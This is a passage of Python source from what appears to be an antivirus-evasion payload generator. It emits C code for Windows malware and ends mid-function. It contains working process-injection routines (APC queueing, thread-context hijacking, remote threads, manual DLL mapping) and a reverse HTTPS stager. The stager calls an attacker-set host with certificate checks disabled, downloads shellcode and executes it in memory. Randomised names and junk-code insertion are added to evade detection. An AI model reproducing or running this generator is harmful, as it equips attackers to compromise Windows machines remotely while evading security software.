            Ret_code += NdcWriteProcessMemory + "(" + RandhProcess +  "," + Randlpv2 +  "," + Randlpv +  "," + RandvarFsize +  ",NULL);\n"

        else:

            Ret_code += "LPVOID " + Randlpv2 +  " = VirtualAllocEx(" + RandhProcess +  ",NULL," + RandvarFsize +  ",MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "WriteProcessMemory(" + RandhProcess +  "," + Randlpv2 +  "," + Randlpv +  "," + RandvarFsize +  ",NULL);\n"

        if "APC" in ModOpt["ExecMethod"]:

            RandThreadsnapshot = varname_creator()
            RandTargetThread = varname_creator()
            RandTentry = varname_creator()
            RandAPC = varname_creator()


            Ret_code += "HANDLE " + RandThreadsnapshot + " = INVALID_HANDLE_VALUE;\n"
            Ret_code += "THREADENTRY32 " + RandTentry + ";\n"
            Ret_code += RandTentry + ".dwSize = sizeof(THREADENTRY32);\n"
            Ret_code += "PTHREAD_START_ROUTINE " + RandAPC + " = (PTHREAD_START_ROUTINE)((ULONG_PTR)" + Randlpv2 +  "+" + RandLoaderOffset + ");\n" 

            if ModOpt["DynImport"] == True:
                User32 = varname_creator()

                NdcThread32First = varname_creator()
                NdcThread32Next = varname_creator()
                NdcOpenThread = varname_creator()
                NdcQueueAPC = varname_creator()

                Ret_code += "HANDLE " + User32 + " = GetModuleHandle(\"user32.dll\");\n"
                Ret_code += "FARPROC " + NdcThread32First + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Thread32First\");\n"
                Ret_code += "FARPROC " + NdcThread32Next + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Thread32Next\");\n"
                Ret_code += "FARPROC " + NdcOpenThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"OpenThread\");\n"
                Ret_code += "FARPROC " + NdcQueueAPC + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"QueueUserAPC\");\n"
                Ret_code += RandThreadsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPTHREAD,0);\n"
                Ret_code += "if(" + RandThreadsnapshot + " != INVALID_HANDLE_VALUE){\n"
                Ret_code += "if(!" + NdcThread32First + "(" + RandThreadsnapshot + ",&" + RandTentry + ")){ CloseHandle(" + RandThreadsnapshot + ");}\n"
                Ret_code += "do{\n"
                Ret_code += "if(" + RandTentry + ".th32OwnerProcessID == " + Randentry + ".th32ProcessID){\n"
                Ret_code += "HANDLE " + RandTargetThread + " = (HANDLE)" + NdcOpenThread + "(THREAD_ALL_ACCESS ,FALSE," + RandTentry + ".th32ThreadID);\n"
                Ret_code += "if(" + RandTargetThread + " != NULL){\n"
                Ret_code += NdcQueueAPC + "((PAPCFUNC)" + RandAPC + "," + RandTargetThread + ",(ULONG_PTR)NULL);}}\n"
                Ret_code += "}while(" + NdcThread32Next + "(" + RandThreadsnapshot + ",&" + RandTentry + "));}\n"

            else:

                Ret_code += RandThreadsnapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0);\n"
                Ret_code += "if(" + RandThreadsnapshot + " != INVALID_HANDLE_VALUE){\n"
                Ret_code += "if(!Thread32First(" + RandThreadsnapshot + ",&" + RandTentry + ")){ CloseHandle(" + RandThreadsnapshot +");}\n"                
                Ret_code += "do{\n"
                Ret_code += "if(" + RandTentry + ".th32OwnerProcessID == " + Randentry + ".th32ProcessID){\n"
                Ret_code += "HANDLE " + RandTargetThread + " = OpenThread(THREAD_ALL_ACCESS ,FALSE," + RandTentry + ".th32ThreadID);\n"
                Ret_code += "if(" + RandTargetThread + " != NULL){\n"
                Ret_code += "QueueUserAPC((PAPCFUNC)" + RandAPC + "," + RandTargetThread + ",(ULONG_PTR)NULL);}}\n"
                Ret_code += "}while(Thread32Next(" + RandThreadsnapshot + ",&" + RandTentry + "));}\n"


        elif "TC" in ModOpt["ExecMethod"]:
   
            RandThreadsnapshot = varname_creator()
            RandTargetThread = varname_creator()
            RandTentry = varname_creator()
            RandContext = varname_creator()
            RandRemCtx = varname_creator()
            RandRemStack = varname_creator()


            Ret_code += "HANDLE " + RandThreadsnapshot + " = INVALID_HANDLE_VALUE;\n" 
            Ret_code += "THREADENTRY32 " + RandTentry + ";\n" 

            if ModOpt["DynImport"] == True:
                NdcThread32First = varname_creator()
                NdcThread32Next = varname_creator()
                NdcOpenThread = varname_creator()
                NdcSuspendThread = varname_creator()
                NdcGetThreadContext = varname_creator()
                NdcSetThreadContext = varname_creator()
                NdcResumeThread = varname_creator()
                #NdcTl32Snapshot = varname_creator()
                #Ret_code += "HANDLE " + User32 + " = GetModuleHandle(\"user32.dll\");\n"
                Ret_code += "FARPROC " + NdcThread32First + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Thread32First\");\n"
                Ret_code += "FARPROC " + NdcThread32Next + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Thread32Next\");\n"
                Ret_code += "FARPROC " + NdcOpenThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"OpenThread\");\n"
                Ret_code += RandThreadsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPTHREAD,0);\n"
                Ret_code += "if(" + RandThreadsnapshot + " != INVALID_HANDLE_VALUE){\n"
                Ret_code += "if(!" + NdcThread32First + "(" + RandThreadsnapshot + ",&" + RandTentry + ")){ CloseHandle(" + RandThreadsnapshot + ");}\n"
                Ret_code += "do{\n"
                Ret_code += "if(" + RandTentry + ".th32OwnerProcessID == " + Randentry + ".th32ProcessID){\n"
                Ret_code += "HANDLE " + RandTargetThread + " = (HANDLE)" + NdcOpenThread + "(THREAD_SUSPEND_RESUME|THREAD_SET_CONTEXT|THREAD_GET_CONTEXT,FALSE," + RandTentry + ".th32ThreadID);\n"
                Ret_code += "if(" + RandTargetThread + " != NULL){\n"
                Ret_code += "CONTEXT " + RandContext + ";\n"
                Ret_code += "PVOID " + RandRemCtx + " = NULL;\n"
                Ret_code += "PVOID " + RandRemStack + " = NULL;\n"
                Ret_code += "FARPROC " + NdcSuspendThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"SuspendThread\");\n"
                Ret_code += "if(" + NdcSuspendThread + "(" + RandTargetThread + ") != -1){\n"
                Ret_code += RandContext + ".ContextFlags = CONTEXT_FULL;\n"
                Ret_code += "FARPROC " + NdcGetThreadContext + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"GetThreadContext\");\n"
                Ret_code += "if(" + NdcGetThreadContext + "(" + RandTargetThread + ",&" + RandContext + ")){\n"       
                #Ret_code += "FARPROC " + NdcVirtualAllocEx + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"VirtualAllocEx\");\n"        
                Ret_code += RandRemCtx + " = (LPVOID)" + NdcVirtualAllocEx + "(" + RandhProcess + ", NULL,sizeof(" + RandContext + "),MEM_COMMIT,PAGE_READWRITE);\n"
                #Ret_code += "FARPROC " + NdcWriteProcessMemory + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"WriteProcessMemory\");\n"                 
                Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + "," + RandRemCtx + ",&" + RandContext + ",sizeof(" + RandContext + "),NULL);\n"

                if ModOpt["Arch"] == "x86":

                    Ret_code += RandContext + ".Eip = (DWORD)" + Randlpv2 +  " + " + RandLoaderOffset +  ";\n" # GIUSTO??

                elif ModOpt["Arch"] == "x64":

                    Ret_code += RandContext + ".Rip = (DWORD64)" + Randlpv2 +  " + " + RandLoaderOffset +  ";\n"
                    Ret_code += RandContext + ".Rcx = (DWORD64)" + RandRemCtx + ";\n"
                    Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + ",(LPVOID)(((LPBYTE)" + Randlpv2 +  ")+2),&" + RandContext + ".Rcx,sizeof(" + RandContext + ".Rcx),NULL);\n"

                    #let stack have some room to grow up or down
                    Ret_code += RandContext + ".Rsp = " + RandContext + ".Rsp - 0x2000;\n"

                Ret_code += "FARPROC " + NdcSetThreadContext + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"SetThreadContext\");\n"
                Ret_code += NdcSetThreadContext + "(" + RandTargetThread + ",&" + RandContext + ");\n"
                Ret_code += "FARPROC " + NdcResumeThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"ResumeThread\");\n"
                Ret_code += NdcResumeThread + "(" + RandTargetThread + ");\n"
                Ret_code += "break;"
                Ret_code += "}}}}}while(Thread32Next(" + RandThreadsnapshot + ",&" + RandTentry + "));}\n"
            else:
                Ret_code += RandThreadsnapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0);\n"
                Ret_code += "if(" + RandThreadsnapshot + " != INVALID_HANDLE_VALUE){\n"
                Ret_code += "if(!Thread32First(" + RandThreadsnapshot + ",&" + RandTentry + ")){ CloseHandle(" + RandThreadsnapshot +");}\n"                
                Ret_code += "do{\n"
                Ret_code += "if(" + RandTentry + ".th32OwnerProcessID == " + Randentry + ".th32ProcessID){\n"
                Ret_code += "HANDLE " + RandTargetThread + " = OpenThread(THREAD_SUSPEND_RESUME|THREAD_SET_CONTEXT|THREAD_GET_CONTEXT,FALSE," + RandTentry + ".th32ThreadID);\n"
                Ret_code += "if(" + RandTargetThread + " != NULL){\n"
                Ret_code += "CONTEXT " + RandContext + ";\n"
                Ret_code += "PVOID " + RandRemCtx + " = NULL;\n"
                Ret_code += "PVOID " + RandRemStack + " = NULL;\n"
                Ret_code += "if(SuspendThread(" + RandTargetThread + ") != -1){\n"
                Ret_code += RandContext + ".ContextFlags = CONTEXT_FULL;\n"
                Ret_code += "if(GetThreadContext(" + RandTargetThread + ",&" + RandContext + ")){\n"
                Ret_code += RandRemCtx + " = VirtualAllocEx(" + RandhProcess + ", NULL,sizeof(" + RandContext + "),MEM_COMMIT,PAGE_READWRITE);\n"
                Ret_code += "WriteProcessMemory(" + RandhProcess + "," + RandRemCtx + ",&" + RandContext + ",sizeof(" + RandContext + "),NULL);\n"

                if ModOpt["Arch"] == "x86":

                    Ret_code += RandContext + ".Eip = (DWORD)" + Randlpv2 +  " + " + RandLoaderOffset +  ";\n" # GIUSTO??

                elif ModOpt["Arch"] == "x64":

                    Ret_code += RandContext + ".Rip = (DWORD64)" + Randlpv2 +  " + " + RandLoaderOffset +  ";\n"
                    Ret_code += RandContext + ".Rcx = (DWORD64)" + RandRemCtx + ";\n"
                    Ret_code += "WriteProcessMemory(" + RandhProcess + ",(LPVOID)(((LPBYTE)" + Randlpv2 +  ")+2),&" + RandContext + ".Rcx,sizeof(" + RandContext + ".Rcx),NULL);\n"

                    #let stack have some room to grow up or down
                    Ret_code += RandContext + ".Rsp = " + RandContext + ".Rsp - 0x2000;\n"

                Ret_code += "SetThreadContext(" + RandTargetThread + ",&" + RandContext + ");\n"
                Ret_code += "ResumeThread(" + RandTargetThread + ");\n"
                Ret_code += "break;"
                Ret_code += "}}}}}while(Thread32Next(" + RandThreadsnapshot + ",&" + RandTentry + "));}\n"

        else:

            if ModOpt["DynImport"] == True:

                NdcCreateRemoteThread = varname_creator()

                Ret_code += "FARPROC " + NdcCreateRemoteThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"CreateRemoteThread\");\n"
                Ret_code += "HANDLE " + RandhThread +  " = (HANDLE)" + NdcCreateRemoteThread + "(" + RandhProcess +  ", NULL,1024*1024,(LPTHREAD_START_ROUTINE)((ULONG_PTR)" + Randlpv2 +  " + " + RandLoaderOffset +  "),NULL,0,NULL);\n"


            else:

                Ret_code += "HANDLE " + RandhThread +  " = CreateRemoteThread(" + RandhProcess +  ", NULL,1024*1024,(LPTHREAD_START_ROUTINE)((ULONG_PTR)" + Randlpv2 +  " + " + RandLoaderOffset +  "),NULL,0,NULL);\n"



    elif ModOpt["ExecMethod"] in ["ManualMap","MM"]:

        NdcVirtualAllocEx = varname_creator()
        NdcWriteProcessMemory = varname_creator()

        Ret_code += "PIMAGE_DOS_HEADER " + RandImgDosHeader + ";\n"
        Ret_code += "PIMAGE_NT_HEADERS " + RandImgNTHeader + ";\n"
        Ret_code += "PIMAGE_SECTION_HEADER " + RandImgSectHeader + ";\n"
        Ret_code += "HANDLE " + RandhThread + ";\n"
        Ret_code += "LPVOID " + Randlpv2 + "," + RandLoaderMem + ";\n"
        Ret_code += "DWORD " + Randflag + ";\n"
        Ret_code += RandLoadStruct + " " + RandPtrLoader+ ";\n"
        Ret_code += RandImgDosHeader + "=(PIMAGE_DOS_HEADER)" + Randlpv + ";\n"
        Ret_code += RandImgNTHeader + "=(PIMAGE_NT_HEADERS)((LPBYTE)" + Randlpv + " + " + RandImgDosHeader + "->e_lfanew);\n"
        Ret_code += "if((" + RandImgNTHeader + "->FileHeader.Characteristics & IMAGE_FILE_DLL)){\n"

        if ModOpt["DynImport"] == True:

            Ret_code += "FARPROC " + NdcVirtualAllocEx + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualAllocEx\");\n"
            Ret_code += "FARPROC " + NdcWriteProcessMemory + " = GetProcAddress(" + ModOpt["NtdllHandle"] + ", \"WriteProcessMemory\");\n"
            Ret_code += Randlpv2 + " = (LPVOID)" + NdcVirtualAllocEx + "(" + RandhProcess + ",(LPVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase), " + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "if(" + Randlpv2 + " == NULL){\n"
            Ret_code += Randlpv2 + " = (LPVOID)" + NdcVirtualAllocEx + "(" + RandhProcess + ",NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}\n"
            Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + "," + Randlpv2 + "," + Randlpv + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,NULL);\n"
            Ret_code += RandImgSectHeader + " = (PIMAGE_SECTION_HEADER)(" + RandImgNTHeader + "+1);\n"
            Ret_code += "for(" + Randflag + "=0;" + Randflag + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag + "++){\n"
            Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + ",(LPVOID)((LPBYTE)" + Randlpv2 + "+" + RandImgSectHeader + "[" + Randflag + "].VirtualAddress),(LPVOID)((LPBYTE)" + Randlpv + "+" + RandImgSectHeader + "[" + Randflag + "].PointerToRawData)," + RandImgSectHeader + "[" + Randflag + "].SizeOfRawData,NULL);}\n"
            Ret_code += RandLoaderMem + " = (LPVOID)" + NdcVirtualAllocEx + "(" + RandhProcess + ",NULL,4096,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"

        else:

            Ret_code += Randlpv2 + " = VirtualAllocEx(" + RandhProcess + ",(LPVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase), " + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "if(" + Randlpv2 + " == NULL){\n"
            Ret_code += Randlpv2 + "=VirtualAllocEx(" + RandhProcess + ",NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}\n"
            Ret_code += "WriteProcessMemory(" + RandhProcess + "," + Randlpv2 + "," + Randlpv + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,NULL);\n"
            Ret_code += RandImgSectHeader + "=(PIMAGE_SECTION_HEADER)(" + RandImgNTHeader + "+1);\n"
            Ret_code += "for(" + Randflag + "=0;" + Randflag + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag + "++){\n"
            Ret_code += "WriteProcessMemory(" + RandhProcess + ",(LPVOID)((LPBYTE)" + Randlpv2 + "+" + RandImgSectHeader + "[" + Randflag + "].VirtualAddress),(LPVOID)((LPBYTE)" + Randlpv + "+" + RandImgSectHeader + "[" + Randflag + "].PointerToRawData)," + RandImgSectHeader + "[" + Randflag + "].SizeOfRawData,NULL);}\n"
            Ret_code += RandLoaderMem + " = VirtualAllocEx(" + RandhProcess + ",NULL,4096,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"


        Ret_code += "memset(&" + RandPtrLoader+ ",0,sizeof(" + RandLoadStruct + "));\n"
        Ret_code += RandPtrLoader+ ".ImageBase=" + Randlpv2 + ";\n"
        Ret_code += RandPtrLoader+ ".NtHeaders=(PIMAGE_NT_HEADERS)((LPBYTE)" + Randlpv2 + "+" + RandImgDosHeader + "->e_lfanew);\n"
        Ret_code += RandPtrLoader+ ".BaseRelocation=(PIMAGE_BASE_RELOCATION)((LPBYTE)" + Randlpv2 + "+" + RandImgNTHeader + "->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);\n"
        Ret_code += RandPtrLoader+ ".ImportDirectory=(PIMAGE_IMPORT_DESCRIPTOR)((LPBYTE)" + Randlpv2 + "+" + RandImgNTHeader + "->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);\n"
        Ret_code += RandPtrLoader+ ".fnLoadLibraryA=LoadLibraryA;\n"
        Ret_code += RandPtrLoader+ ".fnGetProcAddress=GetProcAddress;\n"
        #Ret_code += RandPtrLoader+ ".fnRtlAddFunctionTable=RtlAddFunctionTable;\n"

        if ModOpt["DynImport"] == True:

            NdcCreateRemoteThread = varname_creator()
            NdcWaitForSingleObject = varname_creator()

            Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + "," + RandLoaderMem + ",&" + RandPtrLoader+ ",sizeof(" + RandLoadStruct + "),NULL);\n"
            Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + ",(LPVOID)((P" + RandLoadStruct + ")" + RandLoaderMem + "+1),LoadDll,(SIZE_T)LoadDllEnd-(SIZE_T)LoadDll,NULL);\n"
            Ret_code += "FARPROC " + NdcCreateRemoteThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"CreateRemoteThread\");\n"
            Ret_code += RandhThread + " = (HANDLE)" + NdcCreateRemoteThread + "(" + RandhProcess + ",NULL,0,(LPTHREAD_START_ROUTINE)((P" + RandLoadStruct + ")" + RandLoaderMem + "+1)," + RandLoaderMem + ",0,NULL);\n"
            Ret_code += "FARPROC " + NdcWaitForSingleObject + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualAllocEx\");\n"
            Ret_code += NdcWaitForSingleObject + "(" + RandhThread + ",-1);}\n"


        else:
            Ret_code += "WriteProcessMemory(" + RandhProcess + "," + RandLoaderMem + ",&" + RandPtrLoader+ ",sizeof(" + RandLoadStruct + "),NULL);\n"
            Ret_code += "WriteProcessMemory(" + RandhProcess + ",(LPVOID)((P" + RandLoadStruct + ")" + RandLoaderMem + "+1),LoadDll,(SIZE_T)LoadDllEnd-(SIZE_T)LoadDll,NULL);\n"
            Ret_code += RandhThread + "=CreateRemoteThread(" + RandhProcess + ",NULL,0,(LPTHREAD_START_ROUTINE)((P" + RandLoadStruct + ")" + RandLoaderMem + "+1)," + RandLoaderMem + ",0,NULL);\n"
            Ret_code += "WaitForSingleObject(" + RandhThread + ",-1);}\n"
            #Ret_code += "DWORD Exitcode;\n"
            #Ret_code += "GetExitCodeThread(" + RandhThread + ",&Exitcode);\n"

    Ret_code += "}}}}\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    Ret_code = JunkInjector(Ret_code,ModOpt["JI"],ModOpt["JF"],ModOpt["EF"],ModOpt["JR"])
    
    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c",Ret_code)
def RevHttpsStager_C_windows(ModOpt):

    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]

    ModOpt["Lhost"] = CheckForBackslash(ModOpt["Lhost"])

    Randlpv = varname_creator()
    Randlpv2 = varname_creator()
    Randpointer = varname_creator()
    RandhInternet = varname_creator()
    RandhConnect = varname_creator()
    RandhRequest = varname_creator()
    RandwFlags = varname_creator()
    RandISOResult = varname_creator()
    RandisSend = varname_creator()
    RandwByteRead = varname_creator()
    RandisRead = varname_creator()
    SumValueFunc = varname_creator()
    RandCharArray = varname_creator()
    RandCharset = varname_creator()
    RandInteger = varname_creator()
    RandRecv_int = varname_creator()
    ChecksumFunction = varname_creator()
    RandCharPtr2 = varname_creator()
    RandFuncFlag1 = varname_creator()
    RandFuncFlag2 = varname_creator()

    Arch = ModOpt["Arch"]
    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]

    if ModOpt["MemAlloc"] in ["SharedSection", "SS"]:

        ModOpt["Buff"] = Randlpv
        ModOpt["Lpvoid"] = varname_creator()
    else:
        ModOpt["Buff"] = Randlpv
        ModOpt["Lpvoid"] = Randlpv

    ModOpt["Decoder"] = "False"

    ModOpt["Bufflen"] = "8000000"

    Ret_code = ""

    IncludeList = [
        "#include <stdlib.h>\n", "#include <windows.h>\n",
        "#include <stdio.h>\n", "#include <string.h>\n", "#include <time.h>\n",
        "#include <math.h>\n"
    ]

    Ret_code += IncludeShuffler(IncludeList) + "#include <tlhelp32.h>\n"

    Ret_code += "#include <wininet.h>\n"

    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        Wininet = varname_creator()
        NdcInternetOpenA = varname_creator()
        NdcInternetConnectA = varname_creator()
        NdcHttpOpenRequestA = varname_creator()
        NdcInternetSetOption = varname_creator()
        NdcHttpSendRequestA = varname_creator()
        NdcInternetReadFile = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + Wininet + " = GetModuleHandle(\"wininet.dll\");\n"
        Ret_code += "FARPROC " + NdcInternetOpenA + " = GetProcAddress(" + Wininet + ", \"InternetOpenA\");\n"
        Ret_code += "HINTERNET " + RandhInternet + " = (HINTERNET)" + NdcInternetOpenA + "(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
        Ret_code += "if (" + RandhInternet + " != NULL){\n"

        Ret_code += "FARPROC " + NdcInternetConnectA + " = GetProcAddress(" + Wininet + ", \"InternetConnectA\");\n"
        Ret_code += "HINTERNET " + RandhConnect + " = (HINTERNET)" + NdcInternetConnectA + "(" + RandhInternet + ", \"" + ModOpt[
            "Lhost"] + "\"," + ModOpt[
                "Lport"] + ", NULL,NULL, INTERNET_SERVICE_HTTP,INTERNET_FLAG_SECURE,1);\n"
        Ret_code += "if (" + RandhConnect + " != NULL){\n"
        Ret_code += "FARPROC " + NdcHttpOpenRequestA + " = GetProcAddress(" + Wininet + ", \"HttpOpenRequestA\");\n"
        Ret_code += "HINTERNET " + RandhRequest + " = (HINTERNET)" + NdcHttpOpenRequestA + "(" + RandhConnect + ",NULL,\"" + UriGenerator(
        ) + "\",NULL, NULL, 0, 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000,1);\n"
        Ret_code += "if (" + RandhRequest + "!= NULL){\n"
        Ret_code += "DWORD " + RandwFlags + " = 0x00002000 | 0x00001000 | 0x00000200 | 0x00000100 | 0x00000080;\n"

        Ret_code += "FARPROC " + NdcInternetSetOption + " = GetProcAddress(" + Wininet + ", \"InternetSetOption\");\n"

        Ret_code += "BOOL " + RandISOResult + " = " + NdcInternetSetOption + "(" + RandhRequest + ",INTERNET_OPTION_SECURITY_FLAGS, &" + RandwFlags + ", sizeof (" + RandwFlags + ") );\n"
        Ret_code += "LPVOID " + Randlpv + ";\n"

        Ret_code += inject_utils.Win_MemLocal(ModOpt)

        Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"

        Ret_code += "FARPROC " + NdcHttpSendRequestA + " = GetProcAddress(" + Wininet + ", \"HttpSendRequestA\");\n"
        Ret_code += "BOOL " + RandisSend + " = " + NdcHttpSendRequestA + "(" + RandhRequest + ", NULL, 0, NULL, 0);\n"
        Ret_code += "if (" + RandisSend + "){\n"
        Ret_code += "FARPROC " + NdcInternetReadFile + " = GetProcAddress(" + Wininet + ", \"InternetReadFile\");\n"
        Ret_code += "DWORD " + RandwByteRead + ";\n"
        Ret_code += "do{\n"
        Ret_code += "BOOL " + RandisRead + " = " + NdcInternetReadFile + "(" + RandhRequest + "," + Randpointer + ", 1024, &" + RandwByteRead + ");\n"

    else:

        Ret_code += "HINTERNET " + RandhInternet + " = InternetOpenA(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
        Ret_code += "if (" + RandhInternet + " != NULL){\n"
        Ret_code += "HINTERNET " + RandhConnect + " = InternetConnectA(" + RandhInternet + ",\"" + ModOpt[
            "Lhost"] + "\"," + ModOpt[
                "Lport"] + ", NULL,NULL, INTERNET_SERVICE_HTTP,INTERNET_FLAG_SECURE,1);\n"
        Ret_code += "if (" + RandhConnect + " != NULL){\n"
        Ret_code += "HINTERNET " + RandhRequest + " = HttpOpenRequestA(" + RandhConnect + ",NULL,\"" + UriGenerator(
        ) + "\",NULL, NULL, 0, 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000,1);\n"
        Ret_code += "if (" + RandhRequest + "!= NULL){\n"
        Ret_code += "DWORD " + RandwFlags + " = 0x00002000 | 0x00001000 | 0x00000200 | 0x00000100 | 0x00000080;\n"
        Ret_code += "BOOL " + RandISOResult + " = InternetSetOption (" + RandhRequest + ",INTERNET_OPTION_SECURITY_FLAGS, &" + RandwFlags + ", sizeof (" + RandwFlags + ") );\n"
        Ret_code += "LPVOID " + Randlpv + ";\n"

        Ret_code += inject_utils.Win_MemLocal(ModOpt)
        Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"
        Ret_code += "BOOL " + RandisSend + " = HttpSendRequestA(" + RandhRequest + ", NULL, 0, NULL, 0);\n"
        Ret_code += "if (" + RandisSend + "){\n"
        Ret_code += "DWORD " + RandwByteRead + ";\n"
        Ret_code += "do{\n"
        Ret_code += "BOOL " + RandisRead + " = InternetReadFile(" + RandhRequest + "," + Randpointer + ",8192, &" + RandwByteRead + ");\n"

    Ret_code += Randpointer + " += " + RandwByteRead + ";\n"
    Ret_code += "}while(" + RandwByteRead + " > 0);\n"

    if "RW/" in MemAlloc and ExecMethod == "Thread":

        Ret_code += inject_utils.Win_ChangeMemProtect(ModOpt)

    if ModOpt["ExecMethod"] == "Thread":

        Ret_code += inject_utils.Win_LocalThread(ModOpt)
    else:
        Ret_code += inject_utils.Win_RemoteInjection(ModOpt)

    Ret_code += "}}}}\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            ModOpt["JR"])

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c", Ret_code)
def DownloadExecExe_C_windows(ModOpt):

    UrlTarget = ModOpt["UrlTarget"]
    Filesize = ModOpt["Filesize"]

    RandvarFsize = varname_creator()
    Randsi = varname_creator()
    Randpi = varname_creator()
    RandTcontext = varname_creator()
    Randlpv = varname_creator()
    Randpointer = varname_creator()
    RandhInternet = varname_creator()
    RandhURL = varname_creator()
    RandvarBRead = varname_creator()
    RandvarBWritten = varname_creator()
    RandisRead = varname_creator()
    RandImgDosHeader = varname_creator()
    RandImgNTHeader = varname_creator()
    RandImgSectHeader = varname_creator()
    NdcNtUnmapViewofSection = varname_creator()
    RandlpProcImgBAddr = varname_creator()
    RandlpNewImgBAddr = varname_creator()
    RandrelocData = varname_creator()
    RandDelta = varname_creator()
    Randflag = varname_creator()
    Randflag2 = varname_creator()
    Randflag3 = varname_creator()
    RandSectName = varname_creator()
    RandRelocSectRawData = varname_creator()
    RandOffsetInRelocSect = varname_creator()
    RandEntryCount = varname_creator()
    RandPBlocks = varname_creator()
    RandFieldAddr = varname_creator()
    RandDwBuff = varname_creator()
    RandlOldProtect = varname_creator()
    RandlNewProtect = varname_creator()

    ModOpt["Lpvoid"] = Randlpv

    CryptFile(ModOpt)

    Ret_code = ""

